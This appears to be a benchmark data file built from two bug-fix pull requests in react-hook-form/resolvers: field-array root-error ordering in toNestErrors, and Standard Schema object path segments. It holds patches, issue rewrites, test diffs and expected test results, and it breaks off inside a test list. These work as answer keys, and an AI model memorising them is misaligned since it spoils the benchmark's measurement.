Function: toNestErrors<TFieldValues extends FieldValues>(errors: FieldErrors, options: ResolverOptions<TFieldValues>) Location: src/toNestErrors.ts Inputs: - **errors**: `FieldErrors` – a flat record where keys are field paths (e.g., `"name"` or `"fieldArray.0.name"`) and values are `FieldError` objects containing at least `{ type: string, message: string }`. - **options**: `ResolverOptions<TFieldValues>` – includes: - `fields`: map of internal field names to field metadata (`Field['_f']`) used to attach the original `ref` to each error. - `names` (optional): array of field names (including field array entries) used to detect root errors for field arrays. - `shouldUseNativeValidation`: boolean flag that, when true, triggers native browser validation via `validateFieldsNatively`. Outputs: - Returns `FieldErrors<TFieldValues>` – a nested error object where dot‑notation paths are transformed into nested structures. For field arrays, if a field name appears in `options.names`, a `root` property containing the error for the array itself is added alongside indexed item errors. Description: Converts a flat errors map produced by a resolver into the nested structure expected by React Hook Form, preserving element references and handling root errors for field arrays when applicable. Use it within custom resolvers or when testing error transformation logic.
MIT
{ "base_image_name": "node_20", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx vitest run --reporter=verbose --color=false" }
{ "num_modified_files": 19, "num_modified_lines": 166, "pr_author": "jorisre", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.98, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding root error support for field arrays, and the test suite verifies this behavior with a new snapshot test. The provided code updates replace the old toNestError with a new toNestErrors implementation that handles root errors, and all imports are updated accordingly, matching the test expectations. No mismatches, missing specs, or external dependencies are observed, making the task well‑specified and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
6f1b139cfe34d5c18d07b5201dec427aa3607e3c
2023-12-29 19:32:41
react-hook-form__resolvers-656
diff --git a/src/toNestErrors.ts b/src/toNestErrors.ts index 5c4b839..e68d3d3 100644 --- a/src/toNestErrors.ts +++ b/src/toNestErrors.ts @@ -23,10 +23,7 @@ export const toNestErrors = <TFieldValues extends FieldValues>( }); if (isNameInFieldArray(options.names || Object.keys(errors), path)) { - const fieldArrayErrors = Object.assign( - {}, - compact(get(fieldErrors, path)), - ); + const fieldArrayErrors = Object.assign({}, get(fieldErrors, path)); set(fieldArrayErrors, 'root', error); set(fieldErrors, path, fieldArrayErrors); @@ -38,9 +35,6 @@ export const toNestErrors = <TFieldValues extends FieldValues>( return fieldErrors; }; -const compact = <TValue>(value: TValue[]) => - Array.isArray(value) ? value.filter(Boolean) : []; - const isNameInFieldArray = ( names: InternalFieldName[], name: InternalFieldName,
Fixes error handling for array errors with root error Fixes https://github.com/react-hook-form/resolvers/issues/629 Issue: If you had a field array with two elements and an error in the second element THEN a root error, `.compact` would recognize the second element error as an error in the first element. Solution: Get rid of `.compact`
**Title** Correct handling of array element errors when a root error is present **Problem** When a field array contains an error on a later element and a separate root‑level error, the error‑mapping logic mistakenly attributes the later element’s error to the first element. This results in inaccurate error displays for users interacting with dynamic forms. **Root Cause** The error aggregation process removed falsy entries from the array of element errors, causing the index positions to shift and the subsequent root error to be merged with the wrong array entry. **Fix / Expected Behavior** - Preserve the original order and length of element error arrays instead of filtering out empty entries. - Attach the root error alongside the element errors without altering their indices. - Ensure that each array element’s error remains correctly associated with its corresponding field. - Maintain existing error handling for non‑array fields unchanged. **Risk & Validation** - Verify that forms with mixed element and root errors now report each error on the correct field. - Run the resolver’s test suite, focusing on field array scenarios, to confirm no regression in other error paths. - Perform manual testing of dynamic field arrays with varying numbers of entries to ensure error alignment remains consistent.
656
react-hook-form/resolvers
diff --git a/src/__tests__/toNestErrors.ts b/src/__tests__/toNestErrors.ts index 6ac0df6..983fdde 100644 --- a/src/__tests__/toNestErrors.ts +++ b/src/__tests__/toNestErrors.ts @@ -204,3 +204,54 @@ test('transforms flat object to nested object with root error for field array', ], }); }); + +test('ensures consistent ordering when a field array has a root error and an error in the non-first element', () => { + const result = toNestErrors( + { + 'fieldArrayWithRootError.1.name': { + type: 'second', + message: 'second message', + }, + fieldArrayWithRootError: { type: 'root-error', message: 'root message' }, + }, + { + fields: { + fieldArrayWithRootError: { + name: 'fieldArrayWithRootError', + ref: { name: 'fieldArrayWithRootError' }, + }, + 'fieldArrayWithRootError.0.name': { + name: 'fieldArrayWithRootError.0.name', + ref: { name: 'fieldArrayWithRootError.0.name' }, + }, + 'fieldArrayWithRootError.1.name': { + name: 'fieldArrayWithRootError.1.name', + ref: { name: 'fieldArrayWithRootError.1.name' }, + }, + }, + names: [ + 'fieldArrayWithRootError', + 'fieldArrayWithRootError.0.name', + 'fieldArrayWithRootError.1.name', + ], + shouldUseNativeValidation: false, + }, + ); + + expect(result).toEqual({ + fieldArrayWithRootError: { + '1': { + name: { + type: 'second', + message: 'second message', + ref: { name: 'fieldArrayWithRootError.1.name' }, + }, + }, + root: { + type: 'root-error', + message: 'root message', + ref: { name: 'fieldArrayWithRootError' }, + }, + }, + }); +});
[ "src/__tests__/toNestErrors.ts > ensures consistent ordering when a field array has a root error and an error in the non-first element" ]
[ "src/__tests__/validateFieldsNatively.ts > validates natively fields", "src/__tests__/toNestErrors.ts > transforms flat object to nested object", "src/__tests__/toNestErrors.ts > transforms flat object to nested object and shouldUseNativeValidation: true", "src/__tests__/toNestErrors.ts > transforms flat object to nested object with root error for field array", "superstruct/src/__tests__/Form.tsx > form's validation with Superstruct and TypeScript's integration", "superstruct/src/__tests__/superstruct.ts > superstructResolver > should return values from superstructResolver when validation pass", "superstruct/src/__tests__/superstruct.ts > superstructResolver > should return a single error from superstructResolver when validation fails", "superstruct/src/__tests__/superstruct.ts > superstructResolver > should return values from superstructResolver when validation pass & raw=true", "valibot/src/__tests__/Form.tsx > form's validation with Valibot and TypeScript's integration", "yup/src/__tests__/Form.tsx > form's validation with Yup and TypeScript's integration", "valibot/src/__tests__/valibot.ts > valibotResolver > should return parsed values from valibotResolver with `mode: sync` when validation pass", "valibot/src/__tests__/valibot.ts > valibotResolver > should return a single error from valibotResolver with `mode: sync` when validation fails", "valibot/src/__tests__/valibot.ts > valibotResolver > should return values from valibotResolver when validation pass", "valibot/src/__tests__/valibot.ts > valibotResolver > should return a single error from valibotResolver when validation fails", "valibot/src/__tests__/valibot.ts > valibotResolver > should return values from valibotResolver when validation pass & raw=true", "valibot/src/__tests__/valibot.ts > valibotResolver > should return all the errors from valibotResolver when validation fails with `validateAllFieldCriteria` set to true", "valibot/src/__tests__/valibot.ts > valibotResolver > should return all the errors from valibotResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "valibot/src/__tests__/valibot.ts > valibotResolver > should be able to validate variants", "valibot/src/__tests__/valibot.ts > valibotResolver > should exit issue resolution if no path is set", "yup/src/__tests__/yup.ts > yupResolver > should return values from yupResolver when validation pass", "yup/src/__tests__/yup.ts > yupResolver > should return values from yupResolver with `mode: sync` when validation pass", "yup/src/__tests__/yup.ts > yupResolver > should return a single error from yupResolver when validation fails", "yup/src/__tests__/yup.ts > yupResolver > should return a single error from yupResolver with `mode: sync` when validation fails", "yup/src/__tests__/yup.ts > yupResolver > should return all the errors from yupResolver when validation fails with `validateAllFieldCriteria` set to true", "yup/src/__tests__/yup.ts > yupResolver > should return all the errors from yupResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "yup/src/__tests__/yup.ts > yupResolver > should return an error from yupResolver when validation fails and pass down the yup context", "yup/src/__tests__/yup.ts > yupResolver > should return correct error message with using yup.test", "yup/src/__tests__/yup.ts > yupResolver > should merge default yup resolver options with yup's options", "yup/src/__tests__/yup.ts > yupResolver > should throw an error without inner property", "yup/src/__tests__/yup.ts > yupResolver > should throw any error unrelated to Yup", "yup/src/__tests__/yup.ts > yupResolver > should return values from yupResolver when validation pass & raw=true", "yup/src/__tests__/yup.ts > yupResolver > shoud validate a lazy schema with success", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return values from classValidatorResolver when validation pass", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return values as a raw object from classValidatorResolver when `rawValues` set to true", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return values from classValidatorResolver with `mode: sync` when validation pass", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return a single error from classValidatorResolver when validation fails", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return a single error from classValidatorResolver with `mode: sync` when validation fails", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return all the errors from classValidatorResolver when validation fails with `validateAllFieldCriteria` set to true", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return all the errors from classValidatorResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "class-validator/src/__tests__/class-validator.ts > validate data with transformer option", "class-validator/src/__tests__/class-validator.ts > validate data with validator option", "class-validator/src/__tests__/class-validator.ts > should return from classValidatorResolver with `excludeExtraneousValues` set to true", "nope/src/__tests__/Form.tsx > form's validation with Yup and TypeScript's integration", "nope/src/__tests__/nope.ts > nopeResolver > should return values from nopeResolver when validation pass", "nope/src/__tests__/nope.ts > nopeResolver > should return a single error from nopeResolver when validation fails", "computed-types/src/__tests__/Form.tsx > form's validation with computed-types and TypeScript's integration", "typanion/src/__tests__/Form.tsx > form's validation with Typanion and TypeScript's integration", "joi/src/__tests__/Form.tsx > form's validation with Joi and TypeScript's integration", "zod/src/__tests__/Form.tsx > form's validation with Zod and TypeScript's integration", "valibot/src/__tests__/Form-native-validation.tsx > form's native validation with Valibot", "superstruct/src/__tests__/Form-native-validation.tsx > form's native validation with Superstruct", "yup/src/__tests__/Form-native-validation.tsx > form's native validation with Yup", "computed-types/src/__tests__/computed-types.ts > computedTypesResolver > should return values from computedTypesResolver when validation pass", "computed-types/src/__tests__/computed-types.ts > computedTypesResolver > should return a single error from computedTypesResolver when validation fails", "computed-types/src/__tests__/computed-types.ts > computedTypesResolver > should throw any error unrelated to computed-types", "typanion/src/__tests__/typanion.ts > typanionResolver > should return values from typanionResolver when validation pass", "typanion/src/__tests__/typanion.ts > typanionResolver > should return a single error from typanionResolver when validation fails", "zod/src/__tests__/zod.ts > zodResolver > should return values from zodResolver when validation pass & raw=true", "zod/src/__tests__/zod.ts > zodResolver > should return parsed values from zodResolver with `mode: sync` when validation pass", "zod/src/__tests__/zod.ts > zodResolver > should return a single error from zodResolver when validation fails", "zod/src/__tests__/zod.ts > zodResolver > should return a single error from zodResolver with `mode: sync` when validation fails", "zod/src/__tests__/zod.ts > zodResolver > should return all the errors from zodResolver when validation fails with `validateAllFieldCriteria` set to true", "zod/src/__tests__/zod.ts > zodResolver > should return all the errors from zodResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "zod/src/__tests__/zod.ts > zodResolver > should throw any error unrelated to Zod", "zod/src/__tests__/Form-native-validation.tsx > form's native validation with Zod", "typanion/src/__tests__/Form-native-validation.tsx > form's native validation with Typanion", "nope/src/__tests__/Form-native-validation.tsx > form's native validation with Nope", "computed-types/src/__tests__/Form-native-validation.tsx > form's native validation with computed-types", "vest/src/__tests__/Form.tsx > form's validation with Vest and TypeScript's integration", "arktype/src/__tests__/Form.tsx > form's validation with arkType and TypeScript's integration", "joi/src/__tests__/joi.ts > joiResolver > should return values from joiResolver when validation pass", "joi/src/__tests__/joi.ts > joiResolver > should return values from joiResolver with `mode: sync` when validation pass", "joi/src/__tests__/joi.ts > joiResolver > should return a single error from joiResolver when validation fails", "joi/src/__tests__/joi.ts > joiResolver > should return a single error from joiResolver with `mode: sync` when validation fails", "joi/src/__tests__/joi.ts > joiResolver > should return all the errors from joiResolver when validation fails with `validateAllFieldCriteria` set to true", "joi/src/__tests__/joi.ts > joiResolver > should return all the errors from joiResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "joi/src/__tests__/joi.ts > joiResolver > should return values from joiResolver when validation pass and pass down the Joi context", "arktype/src/__tests__/arktype.ts > arktypeResolver > should return values from arktypeResolver when validation pass & raw=true", "arktype/src/__tests__/arktype.ts > arktypeResolver > should return a single error from arktypeResolver when validation fails", "vest/src/__tests__/Form-native-validation.tsx > form's native validation with Vest", "joi/src/__tests__/Form-native-validation.tsx > form's native validation with Joi", "arktype/src/__tests__/Form-native-validation.tsx > form's native validation with Zod", "class-validator/src/__tests__/Form-native-validation.tsx > form's native validation with Class Validator", "class-validator/src/__tests__/Form.tsx > form's validation with Class Validator and TypeScript's integration", "vest/src/__tests__/vest.ts > vestResolver > should return values from vestResolver when validation pass", "vest/src/__tests__/vest.ts > vestResolver > should return values from vestResolver with `mode: sync` when validation pass", "vest/src/__tests__/vest.ts > vestResolver > should return single error message from vestResolver when validation fails and validateAllFieldCriteria set to false", "vest/src/__tests__/vest.ts > vestResolver > should return single error message from vestResolver when validation fails and validateAllFieldCriteria set to false and `mode: sync`", "vest/src/__tests__/vest.ts > vestResolver > should return all the error messages from vestResolver when validation fails and validateAllFieldCriteria set to true", "vest/src/__tests__/vest.ts > vestResolver > should return all the error messages from vestResolver when validation fails and validateAllFieldCriteria set to true and `mode: sync`", "vest/src/__tests__/vest.ts > vestResolver > should call a suite with values, validated field names and a context as arguments", "io-ts/src/__tests__/errorsToRecord.ts > errorsToRecord > should return a correct error for an exact intersection type error object", "io-ts/src/__tests__/errorsToRecord.ts > errorsToRecord > should return a correct error for a branded intersection", "typebox/src/__tests__/typebox.ts > typeboxResolver > should return a single error from typeboxResolver when validation fails", "typebox/src/__tests__/typebox.ts > typeboxResolver > should return all the errors from typeboxResolver when validation fails with `validateAllFieldCriteria` set to true", "typebox/src/__tests__/typebox.ts > typeboxResolver > should validate with success", "io-ts/src/__tests__/Form-native-validation.tsx > form's native validation with io-ts", "io-ts/src/__tests__/Form.tsx > form's validation with io-ts and TypeScript's integration", "ajv/src/__tests__/Form.tsx > form's validation with Ajv and TypeScript's integration", "ajv/src/__tests__/ajv.ts > ajvResolver > should return values from ajvResolver when validation pass", "ajv/src/__tests__/ajv.ts > ajvResolver > should return values from ajvResolver with `mode: sync` when validation pass", "ajv/src/__tests__/ajv.ts > ajvResolver > should return single error message from ajvResolver when validation fails and validateAllFieldCriteria set to false", "ajv/src/__tests__/ajv.ts > ajvResolver > should return single error message from ajvResolver when validation fails and validateAllFieldCriteria set to false and `mode: sync`", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when validation fails and validateAllFieldCriteria set to true", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when validation fails and validateAllFieldCriteria set to true and `mode: sync`", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when requirement fails and validateAllFieldCriteria set to true", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when requirement fails and validateAllFieldCriteria set to true and `mode: sync`", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when some property is undefined and result will keep the input data structure", "typebox/src/__tests__/Form-native-validation.tsx > form's native validation with Zod", "typebox/src/__tests__/Form.tsx > form's validation with Zod and TypeScript's integration", "io-ts/src/__tests__/io-ts.ts > ioTsResolver > should return values from ioTsResolver when validation pass", "io-ts/src/__tests__/io-ts.ts > ioTsResolver > should return a single error from ioTsResolver when validation fails", "io-ts/src/__tests__/io-ts.ts > ioTsResolver > should return all the errors from ioTsResolver when validation fails with `validateAllFieldCriteria` set to true", "ajv/src/__tests__/Form-native-validation.tsx > form's native validation with Ajv" ]
Function: toNestErrors<TFieldValues extends FieldValues>(flatErrors: Record<string, { type: string; message: string }>, options: { fields: Record<string, { name: string; ref: { name: string } }>; names: InternalFieldName[]; shouldUseNativeValidation: boolean }) Location: src/toNestErrors.ts Inputs: - **flatErrors** – a flat error map where keys are field names (e.g., `"fieldArray.1.name"`) and values contain at least `type` and `message`. - **options** – an object containing: - **fields** – a registry of all registered fields, keyed by their internal names, each providing `name` and a reference object (`ref`) used for attaching the original field reference to the resulting nested error. - **names** – the list of internal field names used to decide whether a key belongs to a field array. - **shouldUseNativeValidation** – flag that currently does not affect the nesting logic but is part of the public signature. Outputs: - Returns a nested error object mirroring the structure of the form data. For field arrays it creates a sub‑object keyed by array index, places non‑first‑element errors under their index, and always adds a `root` property for errors that target the array itself. - Each leaf error include the original `type`, `message`, and a `ref` property pointing to the corresponding field’s reference. Description: Converts a flat error map (as produced by resolver libraries) into a deeply nested error structure suitable for React Hook Form’s `formState.errors`. It now preserves ordering for field arrays with a root error by directly assigning array‑level errors without filtering falsy values.
MIT
{ "base_image_name": "node_20", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx vitest run --reporter=verbose --color=false" }
{ "num_modified_files": 1, "num_modified_lines": 1, "pr_author": "SangJunBak", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.96, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/react-hook-form/resolvers/issues/629" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "edge_case_bug" ], "reason": null, "reasoning": "The issue describes a mis‑behaviour when a field array has a root error and a non‑first element error, and proposes to remove the `.compact` call. The added test asserts the correct nesting and ordering, matching the described fix. No test‑suite coupling, hidden naming expectations, external dependencies, ambiguous specs, patch artifacts, or implicit domain knowledge are present. Therefore the task is well‑specified and directly aligned with the tests, qualifying as a solvable (A) task.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
8ea953c84da3ae6a56858b4980fff6df700f8914
2025-02-21 16:09:35
react-hook-form__resolvers-746
diff --git a/bun.lock b/bun.lock index b6d9c48..53d1226 100644 --- a/bun.lock +++ b/bun.lock @@ -9,6 +9,7 @@ "devDependencies": { "@sinclair/typebox": "^0.34.15", "@standard-schema/spec": "^1.0.0", + "@standard-schema/utils": "^0.3.0", "@testing-library/dom": "^10.4.0", "@testing-library/jest-dom": "^6.6.3", "@testing-library/react": "^16.2.0", @@ -412,6 +413,8 @@ "@standard-schema/spec": ["@standard-schema/spec@1.0.0", "", {}, "sha512-m2bOd0f2RT9k8QJx1JN85cZYyH1RqFBdlwtkSlf4tBDYLCiiZnv1fIIwacK6cqwXavOydf0NPToMQgpKq+dVlA=="], + "@standard-schema/utils": ["@standard-schema/utils@0.3.0", "", {}, "sha512-e7Mew686owMaPJVNNLs55PUvgz371nKgwsc4vxE49zsODpJEnxgxRo2y/OKrqueavXgZNMDVj3DdHFlaSAeU8g=="], + "@surma/rollup-plugin-off-main-thread": ["@surma/rollup-plugin-off-main-thread@2.2.3", "", { "dependencies": { "ejs": "^3.1.6", "json5": "^2.2.0", "magic-string": "^0.25.0", "string.prototype.matchall": "^4.0.6" } }, "sha512-lR8q/9W7hZpMWweNiAKU7NQerBnzQQLvi8qnTDU/fxItPhtZVMbPV3lbCwjhIlNBe9Bbr5V+KHshvWmVSG9cxQ=="], "@testing-library/dom": ["@testing-library/dom@10.4.0", "", { "dependencies": { "@babel/code-frame": "^7.10.4", "@babel/runtime": "^7.12.5", "@types/aria-query": "^5.0.1", "aria-query": "5.3.0", "chalk": "^4.1.0", "dom-accessibility-api": "^0.5.9", "lz-string": "^1.5.0", "pretty-format": "^27.0.2" } }, "sha512-pemlzrSESWbdAloYml3bAJMEfNh1Z7EduzqPKprCH5S341frlpYnUEW0H72dLxa6IsYr+mPno20GiSm+h9dEdQ=="], diff --git a/package.json b/package.json index 55b9500..9553d97 100644 --- a/package.json +++ b/package.json @@ -269,6 +269,7 @@ "devDependencies": { "@sinclair/typebox": "^0.34.15", "@standard-schema/spec": "^1.0.0", + "@standard-schema/utils": "^0.3.0", "@testing-library/dom": "^10.4.0", "@testing-library/jest-dom": "^6.6.3", "@testing-library/react": "^16.2.0", diff --git a/standard-schema/package.json b/standard-schema/package.json index de255f3..b67ce00 100644 --- a/standard-schema/package.json +++ b/standard-schema/package.json @@ -13,6 +13,7 @@ "peerDependencies": { "react-hook-form": "^7.0.0", "@standard-schema/spec": "^1.0.0", + "@standard-schema/utils": "^0.3.0", "@hookform/resolvers": "^2.0.0" } } diff --git a/standard-schema/src/standard-schema.ts b/standard-schema/src/standard-schema.ts index 979f640..8d216ba 100644 --- a/standard-schema/src/standard-schema.ts +++ b/standard-schema/src/standard-schema.ts @@ -1,5 +1,6 @@ import { toNestErrors, validateFieldsNatively } from '@hookform/resolvers'; import { StandardSchemaV1 } from '@standard-schema/spec'; +import { getDotPath } from '@standard-schema/utils'; import { FieldError, FieldValues, Resolver } from 'react-hook-form'; function parseIssues( @@ -10,7 +11,7 @@ function parseIssues( for (let i = 0; i < issues.length; i++) { const error = issues[i]; - const path = error.path?.join('.'); + const path = getDotPath(error); if (path) { if (!errors[path]) { @@ -52,15 +53,14 @@ function parseIssues( * ``` */ export function standardSchemaResolver< - TFieldValues extends FieldValues, - Schema extends StandardSchemaV1<TFieldValues, any>, + Schema extends StandardSchemaV1<FieldValues>, >( schema: Schema, resolverOptions: { raw?: boolean; } = {}, -): Resolver<NonNullable<(typeof schema)['~standard']['types']>['output']> { - return async (values: TFieldValues, _, options) => { +): Resolver<StandardSchemaV1.InferOutput<Schema>> { + return async (values, _, options) => { let result = schema['~standard'].validate(values); if (result instanceof Promise) { result = await result;
fix(standard-schema): Propertly handle object path segments In StandardSchema issues, path segments can either be keys or an object with a `.key` value. Current handling just calls `path.join('.')`, which would result in `"object Object"` if any path segments are objects. The Standard Schema team have `@standard-schema/utils` which includes a `getDotPath` that handles segments correctly, so I've used that.
**Title** Properly resolve field paths for Standard Schema issues containing object segments **Problem** When the Standard Schema validator returns validation issues, the path information can be a mix of plain keys and objects with a `.key` property. The resolver previously concatenated path segments directly, which produced invalid identifiers like `"[object Object]"`. This caused errors to be attached to incorrect fields, breaking form error handling. **Root Cause** The resolver assumed every path segment was a string and used simple dot‑joining, ignoring the special object format used by Standard Schema. **Fix / Expected Behavior** - Introduce the official utility for constructing dot‑notation paths from mixed segments. - Update dependencies to include the utility package required for this logic. - Adjust type declarations to align with the standardized schema output inference. - Ensure that error objects are now keyed by the correctly generated dot paths. - Preserve existing resolver functionality while handling both string and object path segments. **Risk & Validation** - Verify that the new utility correctly transforms all possible path segment combinations. - Run the full test suite, especially tests exercising nested validation errors. - Confirm that the added dependency does not introduce version conflicts for downstream users.
746
react-hook-form/resolvers
diff --git a/standard-schema/src/__tests__/__fixtures__/data.ts b/standard-schema/src/__tests__/__fixtures__/data.ts index e37f521..a71f4c5 100644 --- a/standard-schema/src/__tests__/__fixtures__/data.ts +++ b/standard-schema/src/__tests__/__fixtures__/data.ts @@ -1,3 +1,4 @@ +import { StandardSchemaV1 } from '@standard-schema/spec'; import { Field, InternalFieldName } from 'react-hook-form'; import { z } from 'zod'; @@ -86,3 +87,25 @@ export const fields: Record<InternalFieldName, Field['_f']> = { name: 'birthday', }, }; + +export const customSchema: StandardSchemaV1< + StandardSchemaV1.InferInput<typeof schema>, + StandardSchemaV1.InferOutput<typeof schema> +> = { + '~standard': { + version: 1, + vendor: 'custom', + validate: () => ({ + issues: [ + { + path: [{ key: 'username' }], + message: 'Custom error', + }, + { + path: [{ key: 'like' }, { key: 0 }, { key: 'id' }], + message: 'Custom error', + }, + ], + }), + }, +}; diff --git a/standard-schema/src/__tests__/__snapshots__/standard-schema.ts.snap b/standard-schema/src/__tests__/__snapshots__/standard-schema.ts.snap index f8a68ff..2dba659 100644 --- a/standard-schema/src/__tests__/__snapshots__/standard-schema.ts.snap +++ b/standard-schema/src/__tests__/__snapshots__/standard-schema.ts.snap @@ -1,5 +1,29 @@ // Vitest Snapshot v1, https://vitest.dev/guide/snapshot.html +exports[`standardSchemaResolver > should correctly handle path segments that are objects 1`] = ` +{ + "errors": { + "like": [ + { + "id": { + "message": "Custom error", + "ref": undefined, + "type": "", + }, + }, + ], + "username": { + "message": "Custom error", + "ref": { + "name": "username", + }, + "type": "", + }, + }, + "values": {}, +} +`; + exports[`standardSchemaResolver > should return a single error from standardSchemaResolver when validation fails 1`] = ` { "errors": { diff --git a/standard-schema/src/__tests__/standard-schema.ts b/standard-schema/src/__tests__/standard-schema.ts index b99bfc1..46186b6 100644 --- a/standard-schema/src/__tests__/standard-schema.ts +++ b/standard-schema/src/__tests__/standard-schema.ts @@ -1,5 +1,11 @@ import { standardSchemaResolver } from '..'; -import { fields, invalidData, schema, validData } from './__fixtures__/data'; +import { + customSchema, + fields, + invalidData, + schema, + validData, +} from './__fixtures__/data'; const shouldUseNativeValidation = false; @@ -53,4 +59,16 @@ describe('standardSchemaResolver', () => { expect(validateSpy).toHaveBeenCalledTimes(1); expect(result).toMatchSnapshot(); }); + it('should correctly handle path segments that are objects', async () => { + const result = await standardSchemaResolver(customSchema)( + validData, + undefined, + { + fields, + shouldUseNativeValidation, + }, + ); + + expect(result).toMatchSnapshot(); + }); });
[ "typeschema/src/__tests__/Form.tsx > form's validation with TypeSchema and TypeScript's integration" ]
[ "valibot/src/__tests__/Form.tsx > form's validation with Valibot and TypeScript's integration", "typeschema/src/__tests__/typeschema.ts > typeschemaResolver > should return values from typeschemaResolver when validation pass & raw=true", "typeschema/src/__tests__/typeschema.ts > typeschemaResolver > should return parsed values from typeschemaResolver when validation pass", "typeschema/src/__tests__/typeschema.ts > typeschemaResolver > should return a single error from typeschemaResolver when validation fails", "typeschema/src/__tests__/typeschema.ts > typeschemaResolver > should return all the errors from typeschemaResolver when validation fails with `validateAllFieldCriteria` set to true", "joi/src/__tests__/joi.ts > joiResolver > should return values from joiResolver when validation pass", "joi/src/__tests__/joi.ts > joiResolver > should return values from joiResolver with `mode: sync` when validation pass", "joi/src/__tests__/joi.ts > joiResolver > should return a single error from joiResolver when validation fails", "joi/src/__tests__/joi.ts > joiResolver > should return a single error from joiResolver with `mode: sync` when validation fails", "joi/src/__tests__/joi.ts > joiResolver > should return all the errors from joiResolver when validation fails with `validateAllFieldCriteria` set to true", "joi/src/__tests__/joi.ts > joiResolver > should return all the errors from joiResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "joi/src/__tests__/joi.ts > joiResolver > should return values from joiResolver when validation pass and pass down the Joi context", "typeschema/src/__tests__/typeschema.ts > typeschemaResolver > should throw any error unrelated to TypeSchema", "computed-types/src/__tests__/Form.tsx > form's validation with computed-types and TypeScript's integration", "ajv/src/__tests__/ajv.ts > ajvResolver > should return values from ajvResolver when validation pass", "yup/src/__tests__/yup.ts > yupResolver > should return values from yupResolver when validation pass", "yup/src/__tests__/yup.ts > yupResolver > should return values from yupResolver with `mode: sync` when validation pass", "yup/src/__tests__/yup.ts > yupResolver > should return a single error from yupResolver when validation fails", "yup/src/__tests__/yup.ts > yupResolver > should return a single error from yupResolver with `mode: sync` when validation fails", "yup/src/__tests__/yup.ts > yupResolver > should return all the errors from yupResolver when validation fails with `validateAllFieldCriteria` set to true", "yup/src/__tests__/yup.ts > yupResolver > should return all the errors from yupResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "yup/src/__tests__/yup.ts > yupResolver > should return an error from yupResolver when validation fails and pass down the yup context", "yup/src/__tests__/yup.ts > yupResolver > should return correct error message with using yup.test", "yup/src/__tests__/yup.ts > yupResolver > should merge default yup resolver options with yup's options", "yup/src/__tests__/yup.ts > yupResolver > should throw an error without inner property", "yup/src/__tests__/yup.ts > yupResolver > should throw any error unrelated to Yup", "yup/src/__tests__/yup.ts > yupResolver > should return values from yupResolver when validation pass & raw=true", "yup/src/__tests__/yup.ts > yupResolver > shoud validate a lazy schema with success", "computed-types/src/__tests__/Form-native-validation.tsx > form's native validation with computed-types", "valibot/src/__tests__/Form-native-validation.tsx > form's native validation with Valibot", "superstruct/src/__tests__/Form-native-validation.tsx > form's native validation with Superstruct", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return values when validation pass", "ajv/src/__tests__/ajv.ts > ajvResolver > should return values from ajvResolver with `mode: sync` when validation pass", 